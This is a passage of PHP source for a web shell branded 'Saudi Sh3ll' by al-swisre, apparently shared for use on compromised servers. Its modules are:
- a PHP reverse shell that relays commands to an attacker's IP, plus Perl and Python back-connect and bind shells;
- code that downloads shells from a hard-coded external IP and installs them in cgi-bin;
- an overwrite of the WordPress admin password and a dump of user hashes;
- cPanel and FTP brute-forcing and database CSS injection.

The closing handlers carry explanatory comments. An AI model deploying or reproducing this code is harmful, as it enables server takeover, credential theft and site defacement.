1931  <br /><br />
1932 path backup <br /><br /><input type="text" name="path" /><br /><br />
1933 <input type="submit" name="viw" value="Create"  />
1934 
1935 </form>';
1936 exit;
1937 
1938 
1939 
1940 
1941 
1942 }
1943 
1944 
1945 }
1946 
1947 
1948 
1949 
1950 
1951  else if ($op == 'sh3')
1952 
1953 {
1954 
1955 if (isset($_POST['viw']))
1956 {
1957 
1958 $string = $_POST['string'];
1959 $ch = $_POST['ch'];
1960 
1961 if ($ch == 'trs')
1962 {
1963    $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
1964 
1965 }
1966 
1967 else if($ch == 'tr')
1968   {
1969    $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%'  ");
1970   }
1971 
1972 
1973 
1974 
1975 $nu0 = @mysql_num_rows($sql4);
1976 if ($nu0 == 0){echo "No result"; exit;}
1977 
1978 while ($r33o = mysql_fetch_assoc($sql4))
1979 {
1980 
1981 
1982 $date    = $r33o['date'];
1983 $title   = $r33o['title'];
1984 $message = $r33o['message'];
1985 echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
1986 
1987 echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
1988 <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
1989 echo "</table></div>";
1990 exit;
1991 
1992 
1993 
1994 }
1995 
1996 
1997 
1998 
1999 
2000 }
2001 else
2002 {
2003 
2004 echo'<form method="post">
2005  <br /><br />
2006 search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
2007 <option value="tr">ticket</option>
2008 <option value="trs">ticket replies</option>
2009 </select> <br /><br />
2010 <input type="submit" name="viw" value="search"  />
2011 
2012 </form>';
2013 exit;
2014 
2015 
2016 
2017 
2018 
2019 }
2020 }
2021 
2022 
2023 
2024 
2025 else if ($op == 'sh3')
2026 
2027 {
2028 
2029 if (isset($_POST['viw']))
2030 {
2031 
2032 $string = $_POST['string'];
2033 $ch = $_POST['ch'];
2034 
2035 if ($ch == 'trs')
2036 {
2037    $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
2038 
2039 }
2040 
2041 else if($ch == 'tr')
2042   {
2043    $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%'  ");
2044   }
2045 
2046 
2047 
2048 
2049 $nu0 = @mysql_num_rows($sql4);
2050 if ($nu0 == 0){echo "No result"; exit;}
2051 
2052 while ($r33o = @mysql_fetch_assoc($sql4))
2053 {
2054 
2055 
2056 $date    = $r33o['date'];
2057 $title   = $r33o['title'];
2058 $message = $r33o['message'];
2059 echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
2060 
2061 echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
2062 <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
2063 echo "</table></div>";
2064 
2065 
2066 
2067 
2068 }
2069 
2070 
2071 
2072 
2073 
2074 }
2075 else
2076 {
2077 
2078 echo'<form method="post">
2079  <br /><br />
2080 search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
2081 <option value="tr">ticket</option>
2082 <option value="trs">ticket replies</option>
2083 </select> <br /><br />
2084 <input type="submit" name="viw" value="search"  />
2085 
2086 </form>';
2087 
2088 exit;
2089 
2090 
2091 
2092 
2093 }
2094 }
2095 
2096 
2097 else if ($op == 'css')
2098 
2099 {
2100 
2101 if (isset($_POST['viw']))
2102 {
2103    $index = $_POST['index'];
2104    $seh = $_POST['string'];
2105    $rs = search($seh);
2106     if(count($rs) == 0){echo 'No result';exit;}
2107     foreach ($rs as $info)
2108     {
2109 
2110    $table = $info['table'];
2111    $column = $info['column'];
2112 
2113    echo "table :  $table<br /><br />
2114 
2115    column : $column
2116    <form method=\"post\">
2117  <br /><br />
2118 <input type='submit' name='v' value=\"inject\"  />
2119             <input type='hidden' name=\"index\" value=$index>
2120             <input type=\"hidden\" name=\"table\" value='$table'>
2121             <input type=\"hidden\" name=\"column\" value='$column' >
2122             <input type=\"hidden\" name=\"shearc\" value='$seh'>
2123 </form>
2124 ";
2125 
2126 exit;
2127 
2128 
2129 
2130 
2131 
2132 
2133 
2134     }
2135 
2136 
2137 
2138 
2139 
2140 
2141 
2142 }
2143 else
2144 {
2145 
2146 echo'<form method="post">
2147  <br /><br />
2148 search : <input type="text" name="string" />
2149 <br />
2150 Css url : <input type="text" name="index"><br /><br />
2151 <input type="submit" name="viw" value="search"  />
2152 
2153 </form>';
2154 exit;
2155 
2156 
2157 
2158 
2159 
2160 }
2161 
2162    if (isset($_POST['v']))
2163    {
2164 
2165    $seh = $_POST['shearc'] ;
2166    $table = $_POST['table'];
2167    $column = $_POST['column'] ;
2168    $rlcss = $_POST['index'] ;
2169 
2170      $data = "<head><link href=$rlcss rel=stylesheet></head>";
2171 
2172     $query = mysql_query("UPDATE ".$table." SET ".$column." ='$data' WHERE `$column` LIKE '%$seh%'") or die(mysql_error());
2173     if($query){
2174         echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been successfully</div>  </center>";
2175         echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2176         exit;
2177     }else{
2178         echo '<center><br /><div style=\"color: #003300;  font-weight: bold\"> Injection erorr</div>';
2179 
2180 
2181         exit;
2182     }
2183 
2184 
2185    }
2186 
2187 
2188 }
2189 
2190 
2191 else if ($op == 'awp')
2192 
2193 {
2194 
2195 
2196 
2197 if (isset($_POST['viw']))
2198 {
2199 
2200 $pass = $_POST['pass'];
2201 $user = $_POST['user'];
2202 
2203 
2204 $crypt = crypt($pass);
2205 
2206 $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$user."' WHERE ID = 1") or die;
2207 $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die;
2208 
2209 if ($query)
2210 {
2211   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated admin successfully </div>  </center>";
2212   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2213   exit;
2214 }
2215 else if (!$query)
2216 {
2217   echo "<center><br /><div style=\"color: red;  font-weight: bold\">Updated admin erorr </div>  </center>";
2218   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2219   exit;
2220 
2221 }
2222 
2223 
2224 
2225 
2226 
2227 
2228 
2229 }
2230 else
2231 {
2232 
2233 echo'<form method="post">
2234  <br /><br />
2235 user : <input type="text" name="user" /><br /><br />
2236 pass : <input type="text" name="pass" /><br /><br />
2237 <input type="submit" name="viw" value="update"  />
2238 
2239 </form>';
2240 
2241 
2242 
2243 
2244 
2245 }
2246 }
2247 
2248 
2249 else if ($op == 'shwp')
2250 {
2251 
2252 
2253 
2254 
2255 
2256 $sql = 'select * from `wp_users`';
2257 $query =@ mysql_query($sql);
2258 
2259 if ($query)
2260 {
2261 
2262 while ($row = mysql_fetch_assoc($query))
2263 {
2264 
2265 echo "
2266 <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
2267 <tr>
2268        <td>ID :</td>
2269        <td>user :</td>
2270        <td>pass :</td>
2271        <td>email :</td>
2272 
2273 </tr>
2274 
2275 
2276 <tr>
2277        <td>".$row['ID']."</td>
2278        <td>".$row['user_login']."</td>
2279        <td>".$row['user_pass']."</td>
2280         <td>".$row['user_email']."</td>
2281 </tr>
2282 
2283 
2284 
2285 </table>
2286 
2287 
2288   ";
2289 
2290   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2291   exit;
2292 
2293 
2294 
2295 
2296 
2297  }}
2298 
2299 }
2300 
2301 
2302 
2303 }
2304 
2305 break;
2306 
2307 
2308 
2309 /////////////////////////////////////////////// info   ///////////////////////////////////
2310 case 'info':
2311 
2312 $sws = 'al-swisre' ;
2313 if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
2314 
2315 if(strlen($dir)>1 && $dir[1]==":")
2316 $os = "Windows";
2317 else $os = "Linux";
2318 $read = @file_get_contents("http://s92443018.onlinehome.us/cgi-bin/host.php?$ips");
2319 $r3ad = @file_get_contents("http://aruljohn.com/track.pl?host=$ips") ;
2320 $ipnet = @findit($read,"<td nowrap>IP-Network</td><td>&nbsp;</td><td nowrap>","</td>");
2321 $ipb = @findit($read,"<td nowrap>IP-Network-Block</td><td>&nbsp;</td><td nowrap>","</td>");
2322 $hostname = @findit($read,"Hostname:","<br>");
2323 $isp = @findit($r3ad,"ISP</td><td>","</td>");
2324 
2325 
2326 
2327 
2328 
2329 
2330 echo "<div class='info'><table cellpadding='0' align='center' width='60%' >
2331 <tr><td colspan='2'>Information Server</td><tr>
2332 <tr><td>Hostname</td><td>".$hostname."</td></tr>
2333 <tr><td>ISP</td><td>".$isp."</td></tr>
2334 <tr><td>IP-Network</td><td>".$ipnet."</td></tr>
2335 <tr><td>IP-Network-Block</td><td>".$ipb."</td></tr>
2336 <tr><td>Safe Mode</td><td>".(($safe_mode)?(" &nbsp;: <b><font color=red>ON</font></b>"):("<b><font color=green>OFF</font></b>"))."</td></tr>
2337 <tr><td>System</td><td>".$os."</td></tr>
2338 <tr><td>PHP Version </td><td>".phpversion()."</td></tr>
2339 <tr><td>Zend Version </td><td>".@zend_version()."</td></tr>
2340 <tr><td>Magic_Quotes </td><td>". magicQouts()."</td></tr>
2341 <tr><td>Curl </td><td>".Curl()."</td></tr>
2342 <tr><td>Register Globals </td><td>".RegisterGlobals()."</td></tr>
2343 <tr><td>Open Basedir </td><td>".openBaseDir()."</td></tr>
2344 <tr><td>Gzip </td><td>".Gzip()."</td></tr>
2345 <tr><td>Free Space </td><td>".HardSize(disk_free_space('/'))."</td></tr>
2346 <tr><td>Total Space </td><td>".HardSize(disk_total_space("/"))."</td></tr>
2347 <tr><td>MySQL</td><td>".MySQL2()."</td></tr>
2348 <tr><td>MsSQL</td><td>".MsSQL()." </td></tr>
2349 <tr><td>PostgreSQL</td><td>".PostgreSQL()."</td> </tr>
2350 <tr><td>Oracle</td><td>".Oracle()."</td></tr>";
2351 
2352 exit;
2353 
2354 
2355 
2356 
2357 
2358 
2359 
2360 
2361 
2362 
2363 
2364 
2365 
2366 
2367 
2368 
2369 
2370 
2371 
2372 break;
2373 
2374 
2375 ///////////////////////////////// bypass ///////////////////////
2376 
2377 case 'byp':
2378 
2379 
2380 echo '<div class="cont3">
2381 [ <a href="?sws=byp"> bypass </a>]
2382 
2383 [<a href="?sws=byp&op=shell&sh=perl">Make Shell Perl</a>]
2384 
2385 [<a href="?sws=byp&op=shell&sh=py"> Make Shell Python </a>]
2386 [<a href="?sws=byp&op=g3t"> Get file </a>]
2387 
2388 </div><br /><br />'  ;
2389 
2390 $op = $_GET['op'];
2391 
2392 if(@$_GET['dir']){
2393     $dir = $_GET['dir'];
2394     if($dir != 'nullz') $dir = @cleandir($dir);
2395 }
2396 
2397 if ($op == 'shell')
2398 {
2399 
2400 
2401 $sh = $_GET['sh'];
2402 ////////////////////////// perl or python //////////////////////
2403 
2404 if (!isset($_POST['get']))
2405 {
2406 
2407 
2408 
2409 echo "<form method='post'>
2410 Path shell : <input type='text' name='path'  value='".$dir."/cgi-bin' size='30'/><br /><br />
2411 name shell : <input type='text' name='name'  value='shell.sa' size='25' /><br /><br />
2412 htaccess   :<br /><br /><textarea name='htx'>AddHandler cgi-script .sa</textarea>
2413 <br /><br />
2414 <input type='submit' name='get' value='Make' /></form>";
2415 
2416 }else {
2417 
2418 
2419 $path = $_POST['path'];
2420 $name = $_POST['name'];
2421 $htac = $_POST['htx'];
2422 
2423 if (isset($htac))
2424 {
2425 
2426 $fop = @fopen("$path/.htaccess", 'w');
2427 
2428 @fwrite($fop,$htac);
2429 
2430 @fclose($fop);
2431 
2432 }
2433 
2434 $rpath = $path."/".$name;
2435 
2436 
2437 if ($sh == 'perl')
2438 {
2439     $url_shell  = 'http://64.15.137.117/~google/cgi-bin/perl.zip';   /// perl
2440     $path = $dir."/".$d3r."/"."sa.pl";
2441 
2442 }
2443 else if($sh == 'py')
2444 
2445 {
2446 
2447     $url_shell  = 'http://64.15.137.117/~google/cgi-bin/python.zip';  /// python
2448     $path = $dir."/".$d3r."/"."sa.py";
2449 
2450 
2451 }
2452 
2453 //// get shell///
2454 
2455 
2456     $fp = @fopen($rpath, 'w');
2457 
2458     $ch = @curl_init($url_shell);
2459     @curl_setopt($ch, CURLOPT_FILE, $fp);
2460 
2461     $data = @curl_exec($ch);
2462 
2463     @curl_close($ch);
2464     @fclose($fp);
2465 
2466 
2467 
2468 if (!is_file($rpath))
2469 {
2470 
2471 
2472 
2473     $ch = @curl_init($url_shell);
2474     @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2475 
2476     $data = @curl_exec($ch);
2477 
2478     @curl_close($ch);
2479 
2480     @file_put_contents($rpath, $data);
2481 
2482 }elseif (@is_file($rpath)) {
2483 
2484 $ch =@chmod($rpath,0755);
2485 
2486 echo "Sh3ll have been created<br /><br />
2487 $rpath";
2488 
2489 
2490 
2491 }else {echo "error";}
2492 
2493 }
2494 }
2495 ///////////////////// get file ////////////////////
2496 elseif ($op == 'g3t')
2497 {
2498 
2499 if (!isset($_POST['get']))
2500 {
2501 
2502 
2503 echo 'Get file<br /><br /><br />
2504 <form method="post">
2505 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
2506 Url file : <input type="text" name="file" />&nbsp;&nbsp;
2507 to : <input type="text" name="path" value="'.$dir.'/file.php"  /><br /><br />
2508 <input type="submit" name="get" value="Get" />
2509 
2510 </form>' ;exit;
2511 
2512 
2513 
2514 
2515 
2516 
2517 
2518 }
2519 else
2520 {
2521 
2522 $url_shell = $_POST['file'];
2523 $path = $_POST['path'];
2524 
2525 
2526 
2527     $fp = @fopen($path, 'w');
2528 
2529     $ch = @curl_init($url_shell);
2530     @curl_setopt($ch, CURLOPT_FILE, $fp);
2531 
2532     $data = @curl_exec($ch);
2533 
2534     @curl_close($ch);
2535     @fclose($fp);
2536 
2537 
2538 
2539 if (!is_file($path))
2540 {
2541 
2542 
2543 
2544     $ch = @curl_init($url_shell);
2545     @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2546 
2547     $data = @curl_exec($ch);
2548 
2549     @curl_close($ch);
2550 
2551     @file_put_contents($path, $data);
2552 
2553 }elseif (@is_file($path)) {
2554 
2555 
2556 echo "got the file successfully<br /><br />
2557 $path"; exit;
2558 
2559 
2560 
2561 }else {echo "error";}
2562 
2563 
2564 
2565 }
2566 
2567 
2568 
2569 
2570 
2571 }else if(!isset($op)) {}
2572 
2573 
2574 
2575 
2576 
2577 
2578 
2579 break;
2580 
2581 /////////////////////////////////////////////////// Connect Back ////////////////////////////////////
2582 
2583 case 'con':
2584 
2585 
2586 
2587 if (!isset($_POST['con']))
2588 {
2589 echo "";
2590 
2591 echo "
2592 <div class='conn'><table cellpadding='0' align='center'>
2593 <br />
2594 <form method=\"post\">
2595 <tr><td>
2596 <br />Back Connect :<br /> <br />
2597 Ip : <input type=\"text\" name=\"ip\" value='". $_SERVER['REMOTE_ADDR'] ."' />&nbsp;&nbsp;&nbsp;
2598 Port : <input type=\"text\" name=\"port\" />&nbsp;&nbsp;&nbsp;
2599 <select name=\"op\">
2600 <option value=\"php\">PHP</option>
2601 <option value=\"perl\">Perl</option>
2602 <option value=\"python\">Python</option>
2603 </select>&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"con\" value=\"Connect\" /><br /> <br /><br /></td></tr>
2604 <tr><td><br />Bind Connect :<br /><br />Port : <input type=\"text\" name=\"bind_port\" /> <select name=\"op\">
2605 <option value=\"perl\">Perl</option>
2606 <option value=\"python\">Python</option>
2607 </select>
2608 <input type=\"submit\" name=\"con\" value=\"Connect bind\" /> <br /><br /> <br /></td></tr>
2609 
2610 
2611 </form>";
2612 
2613 exit;
2614 
2615 }else
2616 {
2617 
2618 if ($_POST['con'] == 'Connect') {
2619 
2620 
2621 
2622 $ip = $_POST['ip'] ;
2623 $port = $_POST['port'] ;
2624 $op = $_POST['op'] ;
2625 
2626 $bind_perl="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";
2627 $bind_py = "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";
2628 
2629 $back_perl="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";
2630 $back_py = "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";
2631 
2632 ////////////////////////// php ///////////////////////
2633 if ($op == 'php')
2634 {
2635 
2636 $sockfd=fsockopen($ip , $port , $errno, $errstr );
2637 
2638  if($errno != 0)
2639         {
2640             echo "$errno : $errstr";
2641         }
2642         else if (!$sockfd)
2643         {
2644                $result = "error connect!</p>";
2645         }
2646         else
2647         {
2648             fputs ($sockfd ,
2649             "
2650 /
2651 ###
2652 ###
2653 ###
2654 ###
2655 ###
2656 ###
2657 ###
2658 ###
2659 ###
2660 ###
2661 ###
2662 ###
2663 ###
2664 ###
2665 ###
2666 ###\
2667 #                                #
2668 #      Saudi Sh3ll v1.0          #
2669 #                                #
2670 #        by al-swisre            #
2671 #                                #
2672 \
2673 ###
2674 ###
2675 ###
2676 ###
2677 ###
2678 ###
2679 ###
2680 ###
2681 ###
2682 ###
2683 ###
2684 ###
2685 ###
2686 ###
2687 ###
2688 ###/");
2689          $pwd = shell_exec("pwd");
2690          $sysinfo = shell_exec("uname -a");
2691          $id = shell_exec("id");
2692          $len = 1337;
2693          fputs($sockfd ,$sysinfo . "\n" );
2694          fputs($sockfd ,$pwd . "\n" );
2695          fputs($sockfd ,$id ."\n\n" );
2696          while(!feof($sockfd))
2697          {
2698             $cmdPrompt ="(Saudi sh3ll)[$]> ";
2699             fputs ($sockfd , $cmdPrompt );
2700             $command= fgets($sockfd, $len);
2701             fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
2702          }
2703          fclose($sockfd);
2704         }
2705 
2706 echo "End Connect";
2707 exit;
2708 }
2709 
2710 
2711 
2712 
2713 elseif ($op == 'perl')
2714 {
2715 
2716 
2717 op_sa("/tmp/sa.pl",$back_perl);
2718            $out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &");
2719             sleep(1);
2720            echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
2721             unlink("/tmp/sa.pl");
2722 
2723 
2724 
2725 }
2726 
2727 
2728 
2729 elseif ($op == 'python')
2730 {
2731 
2732 
2733 op_sa("/tmp/sa.py",$back_py);
2734            $out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &");
2735             sleep(1);
2736            echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
2737 
2738 
2739 
2740 
2741 }
2742 
2743 }
2744 else if ($_POST['con'] == 'Connect bind'){
2745 /////////////////////// bind /////////////////////
2746 
2747 if ($op == 'perl')
2748 {
2749 
2750 
2751 
2752 $bind_port = $_POST['bind_port'];
2753 
2754 op_sa("/tmp/sa.pl",$bind_perl);
2755            $out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &");
2756             sleep(1);
2757            echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
2758             unlink("/tmp/sa.pl");
2759 
2760 
2761 
2762 }
2763 
2764 else if ($op == 'python')
2765 {
2766 
2767 
2768 $bind_port = $_POST['bind_port'];
2769 
2770 op_sa("/tmp/sa.py",$bind_py);
2771            $out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &");
2772             sleep(1);
2773            echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
2774             unlink("/tmp/sa.py");
2775 
2776 
2777 
2778 
2779 
2780 
2781 }
2782 
2783 
2784 
2785 
2786 
2787 
2788 }}
2789 
2790 
2791 
2792 
2793 
2794 break;
2795 
2796 ////////////////////////////////////////// BruteForce  /////////////////////
2797 
2798 case 'brt':
2799 
2800 echo "<br /><br /><div class='cont3'><a href='$pg?sws=brt'>[ BruteForce ]</a></div><br />";
2801 
2802 
2803 
2804 if (!isset($_POST['bru']))
2805 {
2806 
2807 echo '<form method="post">
2808 
2809 <textarea name="user" cols="30" rows="15">userlist</textarea>
2810 <textarea name="pass" cols="30" rows="15">passlist</textarea><br /><br />
2811 target : <input type="text" name="trg" value="localhost" />&nbsp;&nbsp;&nbsp;
2812 <select name="op">
2813 <option value="cpanel">cpanel</option>
2814 <option value="ftp">ftp</option>
2815 </select><br /> <br />
2816 <input type="submit" name="bru" value="brute" />
2817 </form>';
2818 
2819 exit;
2820 }else
2821 {
2822 
2823 $users = $_POST['user'];
2824 $pass = $_POST['pass'];
2825 $option = $_POST['op'];
2826 $connect_timeout=5;
2827 @ini_set('memory_limit', 1000000000000);
2828 $target = $_POST['trg'];
2829 @set_time_limit(0);
2830 
2831 $userlist = explode ("\n" , $users );
2832 $passlist = explode ("\n" , $pass );
2833 
2834 foreach ($userlist as $user) {
2835 $_user = trim($user);
2836 foreach ($passlist as $password ) {
2837 $_pass = trim($password);
2838 if($option == "ftp"){
2839 ftp_check($target,$_user,$_pass,$connect_timeout);
2840 }
2841 if ($option == "cpanel")
2842 {
2843 cpanel_check($target,$_user,$_pass,$connect_timeout);
2844 }
2845 }
2846 }
2847 
2848 
2849 
2850 
2851 }
2852 
2853 
2854 
2855 
2856 
2857 
2858 break;
2859 
2860 
2861 ///////////////////////////////////////////////////// about ///////////////////////////////////////////
2862 case 'ab':
2863 
2864 echo '<div class="hedr"> <img src="http://im15.gulfup.com/2012-02-03/1328281037731.png" alt="Saudi Shell" > </div><br /> ';
2865 echo "<div class='ab'><table cellpadding='5'  align='center'>";
2866 echo "<tr><td><b>Coded By :</b> al-swisre</td></tr>";
2867 echo "<tr><td><b>E-mail :</b> oy3@hotmail.com</td></tr>";
2868 echo "<tr><td><b>From :</b> Saudi Arabian</td></tr>";
2869 echo "<tr><td><b>Age :</b> 2/1995</td></tr>";
2870 echo "<tr><td><b>twitter :</b> <a  target='_blank'href='https://twitter.com/#!/al_swisre'>al_swisre</a></td></tr>";
2871 echo "<tr><td><b>S.Greetz 2 :</b> Mr.Alsa3ek - Ejram Hacker</td></tr>";
2872 echo "<tr><td><b>Greetz 2 :</b> e.V.E.L - G-B - kinG oF coNTrol - w0LF Gh4m3D - iNjeCt - abu halil 501 -  Mr.Pixy </td></tr><tr><td><b>And :</b> Mr.Black  - IraQiaN-r0x - Oxygen - locked - n4ss  .. and  All members of v4-team.com </td></tr></div>";
2873 
2874 exit;
2875 break;
2876 
2877 
2878 
2879 
2880 
2881 
2882 
2883 
2884 
2885 }
2886 
2887 
2888 
2889 
2890 
2891 
2892 
2893 
2894 }
2895 else
2896 {
2897 /////////// File Manager //////////////
2898 
2899 $sws = 'al-swisre' ;
2900 if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
2901 
2902 if(@$_GET['dir']){
2903     $dir = $_GET['dir'];
2904     if($dir != 'nullz') $dir = @cleandir($dir);
2905 }
2906 
2907 $curdir = @cleandir(@getcwd());
2908 $self = $_SERVER['PHP_SELF'];
2909 $me = $_SERVER['PHP_SELF'];
2910 
2911 if($dir=="") $dir = $curdir;
2912     $dirx = explode(DIRECTORY_SEPARATOR, $dir);
2913     $files = array();
2914     $folders = array();
2915     echo"<br /><div class='t33p'><table cellpadding='0' align='center' width='100%' >";
2916     echo"<tr><td style=\"text-align: left\" >";
2917     echo" Your path : &nbsp;";
2918     for($i=0;$i<count($dirx);$i++){
2919         @$totalpath .= $dirx[$i] . DIRECTORY_SEPARATOR;
2920         echo("<a href='" . $me . "?dir=$totalpath" . "'>$dirx[$i]</a>" . DIRECTORY_SEPARATOR);
2921     }
2922     echo "<td></tr></table></div><br />";
2923     echo"<div class='t3p'><table cellpadding='0' align='center' width='100%' >";
2924     echo"<tr><td>Name</td><td>Size</td><td>Modify</td><td>Owner/Group</td><td>Permissions</td><td>Option<td></td></tr>";
2925     if ($handle = @opendir($dir)) {
2926         while (false != ($link = readdir($handle))) {
2927                $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ;
2928                $gr = @posix_getgrgid(@filegroup($dir."/".$link));
2929             if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){
2930                 $file = array();
2931                 @$file['link'] = "<a href='$me?dir=$dir" . DIRECTORY_SEPARATOR . "$link'>[ $link ]</font></a>";
2932                 $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
2933                 $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
2934 
2935                 $folder = "<tr><td> ".$file['link']."</td><td>dir</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
2936 
2937                 array_push($folders, $folder);
2938             }
2939             else{
2940                 $file = array();
2941                 $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : "";
2942                  $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
2943                  $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
2944                  $file['size'] = @number_format(@filesize($dir."/".$link)/1024,2);
2945                    @$file['link'] = "<a href='?sws=edit&file=$link&dir=$dir'\">".$link ."</a>";
2946                  $file = "<tr><td>".$file['link']."</td><td>".$file['size']."</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=edit&file=$link&dir=$dir'\">E</a> - <a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=dow&file=$link&dir=$dir'\">D</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
2947                 array_push($files, $file);
2948             }
2949 
2950         }
2951          asort($folders);
2952          asort($files);
2953 
2954         foreach($folders as $folder) echo $folder;
2955        foreach($files as $file) echo $file;
2956         echo "</table></div>" ;
2957         closedir($handle);
2958 
2959 
2960 }
2961 
2962 
2963 
2964 
2965 
2966 
2967 
2968 
2969 
2970 
2971 
2972 
2973 
2974 
2975 }
2976 
2977 
// ?sws=rname — rename handler of the file manager.
// $dir and $file are taken verbatim from the query string; nothing below
// normalises them or checks that the target stays inside any base directory.
// $pg is defined outside this chunk (presumably the script's own URL).
if ($_GET['sws'] == 'rname')
{

$dir = $_GET['dir'];

$file = $_GET['file'];

// Both parameters are mandatory; otherwise only a "Back" link is printed.
if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}

// First request (no POST 'edit'): render the action bar and the rename form.
// The values are interpolated into the HTML unescaped.
if (!isset($_POST['edit']))
{

echo "<br />
<div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
<a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
<form method='post'>
new name : <input type='text' value='$file' name='name'  /><br /><br />
<input type='submit' value='edit' name='edit' />

</form>

 ";
}else
{

// Form submitted: the new name comes straight from POST 'name'.
$new = $_POST['name'];

$rn = @rename ($dir."/".$file,$dir."/".$new);

if(!$rn)
{


// Fallback when rename() fails: the raw values are interpolated into a shell
// command run through cmd(). Nothing is printed on this path, so a failed
// rename is indistinguishable from a silent success in the browser.
@cmd("cd $dir;mv $file $new ");


}else
{

echo "<br /><br />Name change successfully";

echo "<br /><br /><a href='?sws=rname&file=$new&dir=$dir'\">[ Back ]</a>";

}



}
}
3028 
3029 
3030 
3031 
3032 
// ?sws=chmod — permission-change handler.
// $dir/$file from the query string are only used to build the links and the
// default value of the form; the path actually passed to chmod() on the POST
// round trip is $_POST['file'], which the client can set to anything.
// $pg is defined outside this chunk (presumably the script's own URL).
if ($_GET['sws'] == 'chmod')
{

$dir = $_GET['dir'];

$file = $_GET['file'];

if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}

// First request: action bar plus the chmod form (path field is unquoted in
// the HTML attribute, so a path containing a space truncates the value).
if (!isset($_POST['edit']))
{

echo "<br />
<div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
<a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
<form method='post'>
File to chmod: <input type='text' value=".$dir."/".$file." name='file' />&nbsp;&nbsp;&nbsp;<select name=\"ch\">
<option value=\"755\">755</option>
<option value=\"777\">777</option>
<option value=\"644\">644</option>
</select>
<br /><br /><input type='submit' value='chmod' name='edit' />

</form>

 ";
}
else
{

$pir = $_POST['ch'];

// NOTE(review): the '755' choice actually applies 0775 (group-writable),
